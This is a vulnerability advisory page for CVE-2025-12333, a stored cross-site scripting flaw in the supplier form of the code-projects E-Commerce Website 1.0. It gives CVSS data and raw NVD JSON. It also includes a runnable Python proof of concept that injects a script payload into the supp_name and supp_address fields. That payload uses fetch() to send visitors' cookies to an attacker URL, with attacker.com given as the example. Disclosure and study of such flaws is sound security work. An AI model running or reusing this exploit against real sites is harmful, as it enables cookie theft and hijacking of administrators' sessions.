CVE-2025-12333

Description

A vulnerability has been found in code-projects E-Commerce Website 1.0. This impacts an unknown function of the file /pages/supplier_add.php. The manipulation of the argument supp_name/supp_address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fabian:e-commerce_website:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects E-Commerce Website 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12333 PoC - Stored XSS in code-projects E-Commerce Website 1.0
# Target: /pages/supplier_add.php

def exploit_xss(target_url, attacker_controlled_url=None):
    """
    Exploit Stored XSS vulnerability in supplier_add.php
    Parameters:
        target_url: Base URL of the vulnerable application
        attacker_controlled_url: URL to receive stolen cookies (optional)
    """
    
    # XSS payload - steals cookies and sends to attacker
    if attacker_controlled_url:
        xss_payload = f'<script>fetch("{attacker_controlled_url}?cookie="+document.cookie)</script>'
    else:
        xss_payload = '<script>alert(document.cookie)</script>'
    
    # Construct the vulnerable endpoint
    endpoint = f"{target_url.rstrip('/')}/pages/supplier_add.php"
    
    # Prepare POST data with XSS payload
    post_data = {
        'supp_name': xss_payload,
        'supp_address': xss_payload,
        'submit': 'Add Supplier'  # Adjust based on actual form field name
    }
    
    print(f"[*] Targeting: {endpoint}")
    print(f"[*] Payload: {xss_payload}")
    
    try:
        # Send POST request with XSS payload
        response = requests.post(endpoint, data=post_data, timeout=10)
        
        if response.status_code == 200:
            print("[+] XSS payload submitted successfully!")
            print("[*] Wait for admin to visit the supplier page to trigger the script")
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12333_poc.py <target_url> [attacker_url]")
        print("Example: python cve-2025-12333_poc.py http://localhost/code-projects http://attacker.com/collect")
        sys.exit(1)
    
    target = sys.argv[1]
    attacker_url = sys.argv[2] if len(sys.argv) > 2 else None
    
    exploit_xss(target, attacker_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12333
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12333
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12333/
[4] VulDB https://vuldb.com/cve/CVE-2025-12333
[5] https://code-projects.org/
[6] https://figshare.com/s/b35b6f6f6a10d8fdc131?file=58703836
[7] https://vuldb.com/?ctiid.330120
[8] https://vuldb.com/?id.330120
[9] https://vuldb.com/?submit.674483

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12333", "sourceIdentifier": "[email protected]", "published": "2025-10-27T23:15:37.360", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in code-projects E-Commerce Website 1.0. This impacts an unknown function of the file /pages/supplier_add.php. The manipulation of the argument supp_name/supp_address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:e-commerce_website:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8DF9909B-C71B-41A0-B872-842A77B5B3EC"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://figshare.com/s/b35b6f6f6a10d8fdc131?file=58703836", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.330120", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330120", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674483", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}